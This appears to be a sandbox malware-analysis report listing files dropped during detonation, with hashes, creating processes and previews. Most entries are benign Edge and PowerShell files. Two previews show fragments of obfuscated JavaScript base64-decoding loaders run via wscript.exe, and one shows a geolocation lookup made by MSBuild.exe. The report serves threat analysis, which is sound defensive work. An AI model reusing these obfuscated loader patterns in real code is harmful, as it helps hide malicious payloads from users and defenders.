.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.0./.6.4.p.o.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\snSm4[1].txt

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (3615), with CRLF line terminators
Category:	dropped
Size (bytes):	6484
Entropy (8bit):	6.18495642408325
Encrypted:	false
SSDEEP:	96:Wa/334AbUPQCQc0Y242BZVhenX/1Hcr1LiFvFfiFvFcF7:93ZbUPQeqTBjhqHWiRtiRCF7
MD5:	524D226281864D288412772C4C42E0D0
SHA1:	CFD4BFA647CA2A88977C37A312072400316ED106
SHA-256:	8A3CCAF7BBCFB3F94432F40C4C4703BBB7254DD079BF981A23C934629470315D
SHA-512:	ACDEF8BAF38C230D228FBC4CC38A35AC07B98906B3A3A759F87829BC4FD50007CD971D49D165671C34596E1D8956C67499CEA716899A610B52079D0839DD9039
Malicious:	false
Preview:	misbecum = {.. emandibulate: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",.. decode: function(lengthenings) {.. var decodedString = "";.. var shaky, tokenization, loveable;.. var saddhu, buriable, tubists, Tucker;.. var voguing = 0;.. lengthenings = lengthenings.replace(/[^A-Za-z0-9+/=]/g, "");.. while (voguing < lengthenings.length) {.. saddhu = this.emandibulate.indexOf(lengthenings.charAt(voguing++));.. buriable = this.emandibulate.indexOf(lengthenings.charAt(voguing++));.. tubists = this.emandibulate.indexOf(lengthenings.charAt(voguing++));.. Tucker = this.emandibulate.indexOf(lengthenings.charAt(voguing++));.. shaky = (saddhu << 2) \| (buriable >> 4);.. tokenization = ((buriable & 15) << 4) \| (tubists >> 2);.. loveable = ((tubists & 3) << 6) \| Tucker;.. decodedString += String.fromCharCode(shaky);.. if (tubists !=

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\DDqbU[1].txt

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (3678), with CRLF line terminators
Category:	dropped
Size (bytes):	6697
Entropy (8bit):	6.050319180411807
Encrypted:	false
SSDEEP:	192:TErYpN6FLYWBWfTMoaBVDTj/9bSkomPHZuzZuN:AUv6FcWBWfTM7DTj1bS6Ph
MD5:	B44BBB120DE13AF8796071113720DD1B
SHA1:	D79F2B1C2CA44F7FEEBA1DFB1786CC3E847B94D5
SHA-256:	15610157DF7EF45C6A82D7D56D18BCF0546BF7245BF681BD199ABE16B7DA8DC9
SHA-512:	7B46705F3B5290F1A5C7136D35B622A208776B905F9FF8C1430A334E64C79AE00739F873BC8D385E6CCDFD1FBB6CA34F1DDC0B8BC672A25061059C06E0625161
Malicious:	false
Preview:	glomeris = {.. reuseable: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",.. decode: function(hollo) {.. var decodedString = "";.. var degust, tibiiform, mergulus;.. var noncovered, liman, hellespontine, tetrakosane;.. var Luoravetlan = 0;.. hollo = hollo.replace(/[^A-Za-z0-9+/=]/g, "");.. while (Luoravetlan < hollo.length) {.. noncovered = this.reuseable.indexOf(hollo.charAt(Luoravetlan++));.. liman = this.reuseable.indexOf(hollo.charAt(Luoravetlan++));.. hellespontine = this.reuseable.indexOf(hollo.charAt(Luoravetlan++));.. tetrakosane = this.reuseable.indexOf(hollo.charAt(Luoravetlan++));.. degust = (noncovered << 2) \| (liman >> 4);.. tibiiform = ((liman & 15) << 4) \| (hellespontine >> 2);.. mergulus = ((hellespontine & 3) << 6) \| tetrakosane;.. decodedString += String.fromCharCode(degust);.. if (hellespontine != 64) d

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	5.019205124979377
Encrypted:	false
SSDEEP:	12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
MD5:	B62617530A8532F9AECAA939B6AB93BB
SHA1:	E4DE9E9838052597EB2A5B363654C737BA1E6A66
SHA-256:	508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
SHA-512:	A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
Malicious:	false
Preview:	{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9434
Entropy (8bit):	4.928515784730612
Encrypted:	false
SSDEEP:	192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5:	D3594118838EF8580975DDA877E44DEB
SHA1:	0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256:	456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512:	103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\3707646f-aa0b-4b70-a248-c82253c70bfb.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	154477
Entropy (8bit):	7.835886983924039
Encrypted:	false
SSDEEP:	3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
MD5:	14937B985303ECCE4196154A24FC369A
SHA1:	ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
SHA-256:	71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
SHA-512:	1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...\|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.\|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,\|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

C:\Users\user\AppData\Local\Temp\TmpUserData\5f297168-411b-44fc-bf5e-3ec4c7801356.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6802
Entropy (8bit):	5.791582445244626
Encrypted:	false
SSDEEP:	96:iaqkHfsnOss5ih/cI9URLl8RotomMFVvl1hKOe4IbONIeTC6XQS0qGqk+Z4uj+rW:ak8VBeiRUAhKO6qRAq1k8SPxVLZ7VTi1
MD5:	E944AE3DA7EF357D43E04B2337FAFAD9
SHA1:	F92748FB847262E7F8C0EB7C47B533F97D2AD051
SHA-256:	0B09337DA8A869653CCC6DD4F584E642C25203AB633C12540D076AF1941F4CF8
SHA-512:	D06EFFC14A2B117CBE8873F4B511E323CB86B795B23DD2BD6C8F4D5AF28457BA812640207A8EC5CC27A9AD687ABD798872426371AB362903CF556593CA98ED19
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADT/rimgiToT5TeStirfZOcEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAD450FgRXjirIhexfisQkP4mOVEYefzQEpe/A/cEhlKCAAAAAA

C:\Users\user\AppData\Local\Temp\TmpUserData\814aa00f-55d1-4e4c-9f33-5389d17a53e0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	8380
Entropy (8bit):	5.792689414028919
Encrypted:	false
SSDEEP:	192:fsNw8VueiRUPCQK/ktVT6qRAq1k8SPxVLZ7VTif:fsNwSUI75tp6q3QxVNZTif
MD5:	8EEDFDA721C370F5074460A1429D39AD
SHA1:	C3E5ED790A8CC3982F9EB55A2D46CD460EDE51E8
SHA-256:	DB95F6E42EC9F5F685809DBEE2623F73F1A271008FAFFA3B1E07CEF13988939D
SHA-512:	CD872FD7316CC892B2E6DDF606FF2340DD29BCAF8FE3AC3D42B4FD07469EDA4F336D61AC67257E1B1A3BA45317F18BF5360A32C166E519F6597A25DC0A48B202
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration

C:\Users\user\AppData\Local\Temp\TmpUserData\877e153e-abc3-4196-a9f2-e559288b4d9a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	8298
Entropy (8bit):	5.799084399705459
Encrypted:	false
SSDEEP:	192:fsNA8VueiRUZCQK/ktVT6qRAq1k8SPxVLZ7VTif:fsNASUw75tp6q3QxVNZTif
MD5:	C39B8759196E362EDC4FF1D164DF8FCB
SHA1:	2AB842F1080DF55A51C5EC2EA74882C91E193DE3
SHA-256:	ECE6E7AF0E6627833C80C1750DDA38621E2C47350E677CC51C68D04101EABFD6
SHA-512:	78960970406989C9744835262525DD5867B77D445635F22700B6EE53F73AF9E48993226ED98BB6A774DFD4E5DA15129D5A9DCA55D05B514455D1BF17F02B9723
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Ve

C:\Users\user\AppData\Local\Temp\TmpUserData\BrowserMetrics\BrowserMetrics-677A3590-1CD0.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.28298941853570864
Encrypted:	false
SSDEEP:	1536:hok7XI0QZFuUWovVvRGwW5RReuJU/XvrNlcijLZtG545:ho2XNUFuUTvV4wW5RRfJujTcijLZtYw
MD5:	C4B342BF7283A32ABB22D74A740F3750
SHA1:	9EF9B02B9CAD0B20638F686A5D7B60A09232C366
SHA-256:	EF61A44813CC4EFE28551DF7C520E1A133ABF852D105047391ACE5EF009762F5
SHA-512:	5FF8157A5156786989F196E67FAF37BD98C88BBD909EB5243AC3BD94F42B139836CAB5B89A938EFA6EFC5944C29546499BD7B1DBC7A8B4F64E3ECBABA9C11C7C
Malicious:	false
Preview:	...@..@...@.....C.].....@...............0...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".jtkodh20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U..G...W6.....>.........."....."...2..."..:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered...

C:\Users\user\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.6219280948873624
Encrypted:	false
SSDEEP:	3:8g6Vvn:8g6Vv
MD5:	9E4E94633B73F4A7680240A0FFD6CD2C
SHA1:	E68E02453CE22736169A56FDB59043D33668368F
SHA-256:	41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
SHA-512:	193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
Malicious:	false
Preview:	level=none expiry=0.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Asset Store\assets.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	1695826
Entropy (8bit):	5.041149438240599
Encrypted:	false
SSDEEP:	24576:TPfQUg6kAdRhiGzmYoAo2ENU0ifYeV3br2M:TPfZ/mS5
MD5:	CF80497730B2A86AC3B15B36D2FB2068
SHA1:	72FEC330B86C45BF61E801CFA4A65A115382075A
SHA-256:	C1D06DB4152760E81930AF5C405CC24AED81E49EC7B74FC9A6EBF483C09D4155
SHA-512:	E1A8F2015B5AFB23ABB7DAFA9151F4132FF12A97F1C7C3C6E08B973C2993FEC1802289FCE5CE1856C68A281A591125925B910FF073184F22104FED508B564930
Malicious:	false
Preview:	...m.................DB_VERSION.1..:..................QUERY_TIMESTAMP:arbitration_priority_list4...13380535965795172.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}].....................QUERY_TIMESTAMP:edge_hub_apps_manifest_gz4.7..13380535965797473.$QUERY:edge_hub_apps_manifest_gz4.7...[{"name":"edge_hub_apps_manifest_gz","url":"https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline","version":{"major":4,"minor":7,"patch":107},"hash":"Qoxdh2pZS19o99emYo77uFsfzxtXVDB75kV6eln53YE=","size":1682291}]=_.../..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivileged

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Asset Store\assets.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	277
Entropy (8bit):	5.095023020447897
Encrypted:	false
SSDEEP:	6:iOH7h1wkn23fpEuEh1ZB2KLldtFlL+q2Pwkn23fpEuEh1tIFUv:7bEfNEh1ZFLJ3+vYfNEh16FUv
MD5:	984A8FD3AED0EFC2B615CFDF92A94191
SHA1:	2C12D714E0450289491D7589EED6C2708D9D6320
SHA-256:	49D2DB94AC97AE399520252A7B273912066A172263BC17F6F022B80E1E8AA0CC
SHA-512:	EC03CA18119CB3AB82F2DF6E638F4645AB853BB31FC4224E7708E42A074F95C696B3E735E0D289BF53E60AFD83CB40253C61EC5AB1A3F06E2B5AF812705D7767
Malicious:	false
Preview:	2025/01/05-02:32:44.999 203c Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Asset Store\assets.db since it was missing..2025/01/05-02:32:45.031 203c Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Asset Store\assets.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Asset Store\assets.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\AssistanceHome\AssistanceHomeSQLite

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	0.3202460253800455
Encrypted:	false
SSDEEP:	6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
MD5:	40B18EC43DB334E7B3F6295C7626F28D
SHA1:	0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
SHA-256:	85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
SHA-512:	8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Cache\Cache_Data\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	0.09686610426308419
Encrypted:	false
SSDEEP:	12:dChxEqggxOxJz/2934aM+euk0++JrIWxvV+6Ngkpbc:dCrEDgxOTz/293S+vrIWJVBNgki
MD5:	6CD99FAD3BBEAE85518FA2C52D536B94
SHA1:	D2C7B4D94C5207E5149BEC34EA9313C500476B52
SHA-256:	9D2108E882EC473BD4E3D78C30C6947D037B4C2B0A7F27DD7B810126C6CFB618
SHA-512:	D286F54AEB40DEFC0CDB7A0DFA461ECF339563816476CE1AE072FAA18DE0997A0D4246FDFAC99147D908B9E13586C9AA96BAF1DC524EF032149B763249A021B1
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Cache\Cache_Data\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.15747298270466636
Encrypted:	false
SSDEEP:	96:mV4A33qV4nC3nV4X3rAZp3R6Foj7NLvXX/q5yg:qnhcsrAzIaNL3
MD5:	9E459C5F9B654CC4581AB53033DA34EC
SHA1:	60A45A4FA07AFDC2A2C6A27C3DA31CB74EAC3BE4
SHA-256:	9FB55F3DA53C0B9CA4C1E6C00AA08AFDBDEB0DBB63157D0F2564EB5A201E8B54
SHA-512:	B709474A9AE96D8F93A8F0B2B3DB8A0AE4AB26D889AC8A64509E81AC05CCF0906FF23FB439FB26A5DAB968E8A86B5F2FE0E323225C5AF98103D93F11657D6BD0
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Cache\Cache_Data\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1056768
Entropy (8bit):	0.7082260950830981
Encrypted:	false
SSDEEP:	768:PlJtrlJtXlJtWIJtpJtAJtfe2FfJtAJtwP/qWJtyTJt3Jt770Kc6LJt:A9eEnqo/
MD5:	44A7BE8859ED7A56AC2C8487913349C1
SHA1:	59A52587C1CD42C80F6A119D658838E12FC666BE
SHA-256:	A01E6390B91C81FDE58DDF7C6D97A839D52B0BE2BD7B83589A1CD2E98882B7FF
SHA-512:	B2096E0D0A1614DF1373639B484340F6741D65F4D35739602FA8ECBA7B5D1DF30220DF6782349AC8D5692456CA101AAB5DF11F2A906EC57257930F0069E84525
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Cache\Cache_Data\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4202496
Entropy (8bit):	0.04312480187296375
Encrypted:	false
SSDEEP:	192:rH/WCxkD7MDPSYAxmemxb7mngJdv9TXJ4MQmLu5/4eeNd:rOKSXs/J7mGnQmLu5/5eNd
MD5:	4D3862637A3E49DEA6B0E914424F7F3E
SHA1:	2ADD705EDC5981DFA1DDA043EF8917DD416CA4B3
SHA-256:	081133A6F01292BF3CDF0BFBAE44EEE97EC2920D820294EA0447EE2D71249D58
SHA-512:	FA1B6C0C9D28F5686D65A17D43EC6473524C7D576CADA3BA68A94B85375C703E750F624CA82ED3A431DBF5A41203A974E041BFCC6681E04CFBE708B34A4AA861
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Cache\Cache_Data\f_000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, was "asset", last modified: Tue Oct 10 17:24:31 2023, max compression, original size modulo 2^32 1682291
Category:	dropped
Size (bytes):	306698
Entropy (8bit):	7.9987659165582645
Encrypted:	true
SSDEEP:	6144:T+NHHzd+zxE+qMYyscgXwaCndu8O5ofivrdx+EAc4YyYObf:6Nnzd8EN/zQctSqveEtfylL
MD5:	0CB634E88A446A3BF2086A0D51C329D0
